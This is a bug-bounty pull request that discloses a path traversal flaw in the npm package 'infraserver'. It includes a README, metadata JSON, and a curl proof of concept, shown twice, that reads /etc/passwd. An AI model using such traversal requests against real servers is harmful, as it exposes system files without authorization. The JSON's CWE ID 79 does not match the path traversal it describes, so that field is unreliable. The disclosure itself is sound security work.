### PR TITLE
Report path traversal in infraserver

### DIFF
--- a/bounties/npm/infraserver/2/README.md
+++ b/bounties/npm/infraserver/2/README.md
@@ -1,0 +1,12 @@
+# Description
+
+`infraserver` is a data server, this package is vulnerable against Directory Traversal, which may allow access to sensitive files and data on the server.
+ For example, requesting the following URL: `/../../etc/passwd` would result in `/etc/passwd` leaking.
+
+
+# POC
+
+  1. Start the server
+    `node server/Infra.data.js`
+  2. `curl -v --path-as-is http://127.0.0.1:46372/../../../../../../../../../../../etc/passwd`
+  3. `/etc/passwd` from the server will be displayed to the user.

--- a/bounties/npm/infraserver/2/vulnerability.json
+++ b/bounties/npm/infraserver/2/vulnerability.json
@@ -1,0 +1,50 @@
+{
+    "PackageVulnerabilityID": "2",
+    "DisclosureDate": "2020-09-11",
+    "AffectedVersionRange": "*",
+    "Summary": "Path Traversal on \"infraserver\"",
+    "Contributor": {
+        "Discloser": "alromh87",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "infraserver",
+        "URL": "https://www.npmjs.com/package/infraserver",
+        "Downloads": "247"
+    },
+    "CWEs": [
+        {
+            "ID": "79",
+            "Description": "Path traversal through usage of \"../\""
+        }
+    ],
+    "CVSS": {
+        "Version": "",
+        "AV": "",
+        "AC": "",
+        "PR": "",
+        "UI": "",
+        "S": "",
+        "C": "",
+        "I": "",
+        "A": "",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "3.8"
+    },
+    "CVEs": [],
+    "Repository": {
+        "URL": "https://github.com/xuemen/infra",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "xumen",
+        "Name": "infra",
+        "Forks": 3,
+        "Stars": 0
+    },
+    "Permalinks": [],
+    "References": []
+}


### PR DESCRIPTION
Found path traversal while code bounting for Arbitrary Code Execution
# POC

  1. Start the server
    `node server/Infra.data.js`
  2. `curl -v --path-as-is http://127.0.0.1:46372/../../../../../../../../../../../etc/passwd`
  3. `/etc/passwd` from the server will be displayed to the user.